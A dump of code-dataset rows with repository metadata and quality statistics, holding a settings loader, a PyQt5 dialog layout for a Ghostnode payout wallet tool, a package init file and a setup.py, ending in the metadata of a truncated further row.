hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
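The two header lines above spell out the per-row schema (repo metadata, the raw file `content`, and a battery of `qsc_*` quality signals). As a hedged sketch (shard name and thresholds are placeholders; pandas with pyarrow assumed), rows with this schema could be loaded and filtered like so:

```python
# Illustrative only: shard path and filter thresholds are assumptions.
import pandas as pd

df = pd.read_parquet('shard-00000.parquet')
keep = df[(df['lang'] == 'Python') & (df['alphanum_fraction'] > 0.5)]
print(keep[['max_stars_repo_name', 'max_stars_repo_path', 'size']].head())
```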
2594fb6de6dffcce3372d066529fcf8255ec3b49 | 573 | py | Python | regulation/settings.py | cfpb/regulations-xml-parser | e3bcbd9025f6fb6fa9ef2671fb8ed061c8de3e88 | [
"CC0-1.0"
] | 4 | 2016-01-02T21:04:42.000Z | 2019-08-17T06:30:36.000Z | regulation/settings.py | DalavanCloud/regulations-xml-parser | e3bcbd9025f6fb6fa9ef2671fb8ed061c8de3e88 | [
"CC0-1.0"
] | 49 | 2016-01-25T15:19:04.000Z | 2017-12-06T20:02:09.000Z | regulation/settings.py | DalavanCloud/regulations-xml-parser | e3bcbd9025f6fb6fa9ef2671fb8ed061c8de3e88 | [
"CC0-1.0"
] | 9 | 2016-01-21T19:25:30.000Z | 2021-02-20T10:53:47.000Z | #!/usr/bin/env python
from __future__ import print_function
from __future__ import unicode_literals
import importlib
import logging
import os
import sys
logger = logging.getLogger(__name__)  # used by the error path below; was undefined
# Try to load the settings module
try:
local_settings = importlib.import_module(
os.environ.get('REGML_SETTINGS_FILE', 'settings'))
globals().update(local_settings.__dict__)
except ImportError:
logger.error("Unable to import settings module. "
"Please double-check your REGML_SETTINGS_FILE "
"environment variable")
sys.exit(1)
| 27.285714 | 64 | 0.722513 | 70 | 573 | 5.542857 | 0.585714 | 0.100515 | 0.082474 | 0.134021 | 0.154639 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002169 | 0.195462 | 573 | 20 | 65 | 28.65 | 0.839479 | 0.09075 | 0 | 0.133333 | 0 | 0 | 0.242775 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.533333 | 0 | 0.533333 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
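The settings loader above merges attributes from whatever module `REGML_SETTINGS_FILE` names into its own globals. As a hedged sketch of driving it (the module name `settings_local` is an assumption, not part of the file):

```python
# Illustrative only: point the loader at a hypothetical "settings_local" module.
import os
os.environ['REGML_SETTINGS_FILE'] = 'settings_local'
import regulation.settings as cfg  # runs the loader; cfg now carries the attributes
```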
2596f72f06a517f88b80e5187a646537bcd3ae06 | 16,968 | py | Python | src/ui/ui_send_payout_dlg.py | muteio/ghostnode-tool | c42868ed6c009c47482d23ebac0d101adbd8c103 | [
"MIT"
] | 1 | 2019-11-02T01:39:52.000Z | 2019-11-02T01:39:52.000Z | src/ui/ui_send_payout_dlg.py | NixPlatform/ghostnode-tool | c42868ed6c009c47482d23ebac0d101adbd8c103 | [
"MIT"
] | null | null | null | src/ui/ui_send_payout_dlg.py | NixPlatform/ghostnode-tool | c42868ed6c009c47482d23ebac0d101adbd8c103 | [
"MIT"
] | 1 | 2019-09-21T15:08:36.000Z | 2019-09-21T15:08:36.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_send_payout_dlg.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_SendPayoutDlg(object):
def setupUi(self, SendPayoutDlg):
SendPayoutDlg.setObjectName("SendPayoutDlg")
SendPayoutDlg.resize(832, 507)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(SendPayoutDlg.sizePolicy().hasHeightForWidth())
SendPayoutDlg.setSizePolicy(sizePolicy)
SendPayoutDlg.setSizeGripEnabled(True)
SendPayoutDlg.setModal(True)
self.verticalLayout = QtWidgets.QVBoxLayout(SendPayoutDlg)
self.verticalLayout.setObjectName("verticalLayout")
self.pnl_input = QtWidgets.QWidget(SendPayoutDlg)
self.pnl_input.setObjectName("pnl_input")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.pnl_input)
self.verticalLayout_4.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.lay_input = QtWidgets.QHBoxLayout()
self.lay_input.setSpacing(8)
self.lay_input.setObjectName("lay_input")
self.label_3 = QtWidgets.QLabel(self.pnl_input)
self.label_3.setObjectName("label_3")
self.lay_input.addWidget(self.label_3)
self.cbo_address_source_mode = QtWidgets.QComboBox(self.pnl_input)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cbo_address_source_mode.sizePolicy().hasHeightForWidth())
self.cbo_address_source_mode.setSizePolicy(sizePolicy)
self.cbo_address_source_mode.setMinimumSize(QtCore.QSize(0, 0))
self.cbo_address_source_mode.setMaximumSize(QtCore.QSize(160, 16777215))
self.cbo_address_source_mode.setObjectName("cbo_address_source_mode")
self.cbo_address_source_mode.addItem("")
self.cbo_address_source_mode.addItem("")
self.cbo_address_source_mode.addItem("")
self.lay_input.addWidget(self.cbo_address_source_mode)
self.sw_address_source = QtWidgets.QStackedWidget(self.pnl_input)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.sw_address_source.sizePolicy().hasHeightForWidth())
self.sw_address_source.setSizePolicy(sizePolicy)
self.sw_address_source.setObjectName("sw_address_source")
self.wdg_address_source_1 = QtWidgets.QWidget()
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wdg_address_source_1.sizePolicy().hasHeightForWidth())
self.wdg_address_source_1.setSizePolicy(sizePolicy)
self.wdg_address_source_1.setObjectName("wdg_address_source_1")
self.horizontalLayout_6 = QtWidgets.QHBoxLayout(self.wdg_address_source_1)
self.horizontalLayout_6.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_6.setSpacing(1)
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.lbl_account = QtWidgets.QLabel(self.wdg_address_source_1)
self.lbl_account.setObjectName("lbl_account")
self.horizontalLayout_6.addWidget(self.lbl_account)
self.cbo_hw_account_nr = QtWidgets.QComboBox(self.wdg_address_source_1)
self.cbo_hw_account_nr.setObjectName("cbo_hw_account_nr")
self.horizontalLayout_6.addWidget(self.cbo_hw_account_nr)
self.btn_add_hw_account_nr = QtWidgets.QToolButton(self.wdg_address_source_1)
self.btn_add_hw_account_nr.setObjectName("btn_add_hw_account_nr")
self.horizontalLayout_6.addWidget(self.btn_add_hw_account_nr)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem)
self.lbl_hw_account_base_path = QtWidgets.QLabel(self.wdg_address_source_1)
self.lbl_hw_account_base_path.setObjectName("lbl_hw_account_base_path")
self.horizontalLayout_6.addWidget(self.lbl_hw_account_base_path)
self.sw_address_source.addWidget(self.wdg_address_source_1)
self.wdg_address_source_2 = QtWidgets.QWidget()
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.wdg_address_source_2.sizePolicy().hasHeightForWidth())
self.wdg_address_source_2.setSizePolicy(sizePolicy)
self.wdg_address_source_2.setObjectName("wdg_address_source_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.wdg_address_source_2)
self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.lblSourceBip32Path = QtWidgets.QLabel(self.wdg_address_source_2)
self.lblSourceBip32Path.setObjectName("lblSourceBip32Path")
self.horizontalLayout_2.addWidget(self.lblSourceBip32Path)
self.edt_src_bip32_path = QtWidgets.QLineEdit(self.wdg_address_source_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.edt_src_bip32_path.sizePolicy().hasHeightForWidth())
self.edt_src_bip32_path.setSizePolicy(sizePolicy)
self.edt_src_bip32_path.setMaximumSize(QtCore.QSize(100, 16777215))
self.edt_src_bip32_path.setStyleSheet("background-color: lightgray;")
self.edt_src_bip32_path.setReadOnly(True)
self.edt_src_bip32_path.setObjectName("edt_src_bip32_path")
self.horizontalLayout_2.addWidget(self.edt_src_bip32_path)
self.btn_src_bip32_path = QtWidgets.QToolButton(self.wdg_address_source_2)
self.btn_src_bip32_path.setObjectName("btn_src_bip32_path")
self.horizontalLayout_2.addWidget(self.btn_src_bip32_path)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.sw_address_source.addWidget(self.wdg_address_source_2)
self.wdg_address_source_3 = QtWidgets.QWidget()
self.wdg_address_source_3.setObjectName("wdg_address_source_3")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.wdg_address_source_3)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.lbl_src_masternode = QtWidgets.QLabel(self.wdg_address_source_3)
self.lbl_src_masternode.setObjectName("lbl_src_masternode")
self.horizontalLayout.addWidget(self.lbl_src_masternode)
self.cbo_src_masternodes = QtWidgets.QComboBox(self.wdg_address_source_3)
self.cbo_src_masternodes.setObjectName("cbo_src_masternodes")
self.horizontalLayout.addWidget(self.cbo_src_masternodes)
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem2)
self.sw_address_source.addWidget(self.wdg_address_source_3)
self.lay_input.addWidget(self.sw_address_source)
self.btnLoadTransactions = QtWidgets.QPushButton(self.pnl_input)
self.btnLoadTransactions.setAutoDefault(False)
self.btnLoadTransactions.setObjectName("btnLoadTransactions")
self.lay_input.addWidget(self.btnLoadTransactions)
spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.lay_input.addItem(spacerItem3)
self.verticalLayout_4.addLayout(self.lay_input)
self.verticalLayout.addWidget(self.pnl_input)
self.splitter = QtWidgets.QSplitter(SendPayoutDlg)
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.main_widget = QtWidgets.QWidget(self.splitter)
self.main_widget.setObjectName("main_widget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.main_widget)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setSpacing(2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.lbl_message_2 = QtWidgets.QLabel(self.main_widget)
self.lbl_message_2.setText("")
self.lbl_message_2.setOpenExternalLinks(True)
self.lbl_message_2.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse|QtCore.Qt.TextSelectableByMouse)
self.lbl_message_2.setObjectName("lbl_message_2")
self.verticalLayout_2.addWidget(self.lbl_message_2)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setContentsMargins(-1, 8, -1, -1)
self.horizontalLayout_4.setSpacing(6)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.btnCheckAll = QtWidgets.QToolButton(self.main_widget)
self.btnCheckAll.setToolTip("")
self.btnCheckAll.setIconSize(QtCore.QSize(12, 12))
self.btnCheckAll.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.btnCheckAll.setObjectName("btnCheckAll")
self.horizontalLayout_4.addWidget(self.btnCheckAll)
self.btnUncheckAll = QtWidgets.QToolButton(self.main_widget)
self.btnUncheckAll.setToolTip("")
self.btnUncheckAll.setIconSize(QtCore.QSize(12, 12))
self.btnUncheckAll.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.btnUncheckAll.setObjectName("btnUncheckAll")
self.horizontalLayout_4.addWidget(self.btnUncheckAll)
self.chbHideCollateralTx = QtWidgets.QCheckBox(self.main_widget)
self.chbHideCollateralTx.setStyleSheet("")
self.chbHideCollateralTx.setObjectName("chbHideCollateralTx")
self.horizontalLayout_4.addWidget(self.chbHideCollateralTx)
self.lbl_message = QtWidgets.QLabel(self.main_widget)
self.lbl_message.setStyleSheet("margin-left:20px;\n"
"font-size:11px;\n"
"background-color: rgb(56, 181, 255);\n"
"color: rgb(255, 255, 255);")
self.lbl_message.setWordWrap(False)
self.lbl_message.setOpenExternalLinks(True)
self.lbl_message.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse|QtCore.Qt.TextSelectableByMouse)
self.lbl_message.setObjectName("lbl_message")
self.horizontalLayout_4.addWidget(self.lbl_message)
spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem4)
self.verticalLayout_2.addLayout(self.horizontalLayout_4)
self.tableView = QtWidgets.QTableView(self.main_widget)
self.tableView.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContentsOnFirstShow)
self.tableView.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.tableView.setShowGrid(True)
self.tableView.setSortingEnabled(False)
self.tableView.setObjectName("tableView")
self.tableView.verticalHeader().setVisible(False)
self.tableView.verticalHeader().setCascadingSectionResizes(True)
self.tableView.verticalHeader().setHighlightSections(False)
self.verticalLayout_2.addWidget(self.tableView)
self.dest_widget1 = QtWidgets.QWidget(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.dest_widget1.sizePolicy().hasHeightForWidth())
self.dest_widget1.setSizePolicy(sizePolicy)
self.dest_widget1.setObjectName("dest_widget1")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.dest_widget1)
self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.dest_widget = QtWidgets.QFrame(self.dest_widget1)
self.dest_widget.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.dest_widget.setObjectName("dest_widget")
self.verticalLayout_3.addWidget(self.dest_widget)
self.verticalLayout.addWidget(self.splitter)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem5)
self.btnSend = QtWidgets.QPushButton(SendPayoutDlg)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnSend.sizePolicy().hasHeightForWidth())
self.btnSend.setSizePolicy(sizePolicy)
self.btnSend.setMinimumSize(QtCore.QSize(200, 0))
self.btnSend.setMaximumSize(QtCore.QSize(200, 16777215))
self.btnSend.setAutoDefault(False)
self.btnSend.setObjectName("btnSend")
self.horizontalLayout_3.addWidget(self.btnSend)
spacerItem6 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem6)
self.btnClose = QtWidgets.QPushButton(SendPayoutDlg)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnClose.sizePolicy().hasHeightForWidth())
self.btnClose.setSizePolicy(sizePolicy)
self.btnClose.setMinimumSize(QtCore.QSize(0, 0))
self.btnClose.setLayoutDirection(QtCore.Qt.LeftToRight)
self.btnClose.setAutoDefault(False)
self.btnClose.setObjectName("btnClose")
self.horizontalLayout_3.addWidget(self.btnClose, 0, QtCore.Qt.AlignRight)
self.verticalLayout.addLayout(self.horizontalLayout_3)
self.retranslateUi(SendPayoutDlg)
self.sw_address_source.setCurrentIndex(2)
QtCore.QMetaObject.connectSlotsByName(SendPayoutDlg)
def retranslateUi(self, SendPayoutDlg):
_translate = QtCore.QCoreApplication.translate
SendPayoutDlg.setWindowTitle(_translate("SendPayoutDlg", "Dialog"))
self.label_3.setText(_translate("SendPayoutDlg", "View as"))
self.cbo_address_source_mode.setItemText(0, _translate("SendPayoutDlg", "Wallet Account"))
self.cbo_address_source_mode.setItemText(1, _translate("SendPayoutDlg", "BIP32 Path"))
self.cbo_address_source_mode.setItemText(2, _translate("SendPayoutDlg", "Ghostnode Address"))
self.lbl_account.setText(_translate("SendPayoutDlg", "Account "))
self.btn_add_hw_account_nr.setToolTip(_translate("SendPayoutDlg", "Add new account number"))
self.btn_add_hw_account_nr.setText(_translate("SendPayoutDlg", "."))
self.lbl_hw_account_base_path.setText(_translate("SendPayoutDlg", "..."))
self.lblSourceBip32Path.setText(_translate("SendPayoutDlg", "BIP32 path"))
self.btn_src_bip32_path.setToolTip(_translate("SendPayoutDlg", "Change BIP32 path"))
self.btn_src_bip32_path.setText(_translate("SendPayoutDlg", "..."))
self.lbl_src_masternode.setText(_translate("SendPayoutDlg", "Ghostnode"))
self.btnLoadTransactions.setText(_translate("SendPayoutDlg", "Reload"))
self.btnCheckAll.setText(_translate("SendPayoutDlg", "Select All"))
self.btnUncheckAll.setText(_translate("SendPayoutDlg", "Unselect All"))
self.chbHideCollateralTx.setText(_translate("SendPayoutDlg", "Hide collateral utxos"))
self.lbl_message.setText(_translate("SendPayoutDlg", "...."))
self.btnSend.setText(_translate("SendPayoutDlg", "Prepare Transaction"))
self.btnClose.setText(_translate("SendPayoutDlg", "Close"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
SendPayoutDlg = QtWidgets.QDialog()
ui = Ui_SendPayoutDlg()
ui.setupUi(SendPayoutDlg)
SendPayoutDlg.show()
sys.exit(app.exec_())
| 61.701818 | 116 | 0.753713 | 1,774 | 16,968 | 6.966742 | 0.125141 | 0.054697 | 0.036249 | 0.040456 | 0.503843 | 0.395582 | 0.295089 | 0.256008 | 0.200987 | 0.160288 | 0 | 0.022664 | 0.149694 | 16,968 | 274 | 117 | 61.927007 | 0.833934 | 0.011256 | 0 | 0.096154 | 1 | 0 | 0.071859 | 0.004055 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007692 | false | 0 | 0.007692 | 0 | 0.019231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2597942237584a092a777b8ebc52564660ff2499 | 251 | py | Python | evo_mwc/__init__.py | mrazomej/evo_mwc | b69c800c5518d906cd2c65334c6feffdbab5acf1 | [
"MIT"
] | null | null | null | evo_mwc/__init__.py | mrazomej/evo_mwc | b69c800c5518d906cd2c65334c6feffdbab5acf1 | [
"MIT"
] | 2 | 2020-06-01T22:36:08.000Z | 2020-07-01T23:32:06.000Z | evo_mwc/__init__.py | mrazomej/evo_mwc | b69c800c5518d906cd2c65334c6feffdbab5acf1 | [
"MIT"
] | 1 | 2019-07-09T21:18:52.000Z | 2019-07-09T21:18:52.000Z | # -*- coding: utf-8 -*-
"""Top level package for evo_utils utilities"""
from . import viz
from . import fitderiv
from . import model
__author__ = """Manuel Razo"""
__email__ = """mrazomej {at} caltech.edu"""
__version__ = '0.0.1'
name = 'evo_mwc'
| 17.928571 | 47 | 0.661355 | 34 | 251 | 4.470588 | 0.823529 | 0.197368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019139 | 0.167331 | 251 | 13 | 48 | 19.307692 | 0.708134 | 0.25498 | 0 | 0 | 0 | 0 | 0.265193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
259eedab428d052f5de5cef2f33e8a5144b57d54 | 1,180 | py | Python | setup.py | transientlunatic/gravitic | 3f818b5b52dafd8db0cef8f7da930996c84125be | [
"BSD-3-Clause"
] | 2 | 2021-04-12T10:38:58.000Z | 2021-04-12T13:53:16.000Z | setup.py | transientlunatic/gravitic | 3f818b5b52dafd8db0cef8f7da930996c84125be | [
"BSD-3-Clause"
] | null | null | null | setup.py | transientlunatic/gravitic | 3f818b5b52dafd8db0cef8f7da930996c84125be | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
# with open('README.rst') as readme_file:
# readme = readme_file.read()
# with open('HISTORY.rst') as history_file:
# history = history_file.read()
with open("requirements.txt") as requires_file:
requirements = requires_file.read().split("\n")
requirements = [requirement for requirement in requirements if not ("+" in requirement)]
test_requirements = [
# TODO: put package test requirements here
]
setup(
name='gravitic',
use_scm_version=True,
setup_requires=['setuptools_scm'],
description="""An abstract gravitational wave pipeline constructor.""",
#long_description=readme + '\n\n' + history,
author="Daniel Williams",
author_email='daniel.williams@ligo.org',
url='https://github.com/transientlunatic/gravitic',
packages=['gravitic'],
package_dir={'gravitic': 'gravitic'},
entry_points={
'console_scripts': [
'gravitic=gravitic.cli:gravitic'
]
},
include_package_data=True,
# install_requires=requirements,
zip_safe=True,
# keywords='supervisor, pe, ligo, asimov',
test_suite='tests',
tests_require=test_requirements,
)
| 28.780488 | 88 | 0.683051 | 132 | 1,180 | 5.931818 | 0.537879 | 0.030651 | 0.030651 | 0.040868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184746 | 1,180 | 40 | 89 | 29.5 | 0.813929 | 0.25678 | 0 | 0 | 0 | 0 | 0.288018 | 0.062212 | 0 | 0 | 0 | 0.025 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.038462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
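The `console_scripts` entry above maps the `gravitic` command to `gravitic.cli:gravitic`. A sketch of verifying that mapping after an install (assumes Python 3.10+ for the `group=` keyword):

```python
# Sketch: confirm the console script declared in setup() resolved after install.
from importlib.metadata import entry_points

for ep in entry_points(group='console_scripts'):
    if ep.name == 'gravitic':
        print(ep.value)  # expected: gravitic.cli:gravitic
```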
25ae6c1ba93e797d3822a5f53bd87f019d8ffea6 | 1,420 | py | Python | modules/Registry/lv1_os_win_reg_mac_address.py | naaya17/carpe | fa2e3cfebe20f8839c985e5b9b78b538800172a1 | [
"Apache-2.0"
] | null | null | null | modules/Registry/lv1_os_win_reg_mac_address.py | naaya17/carpe | fa2e3cfebe20f8839c985e5b9b78b538800172a1 | [
"Apache-2.0"
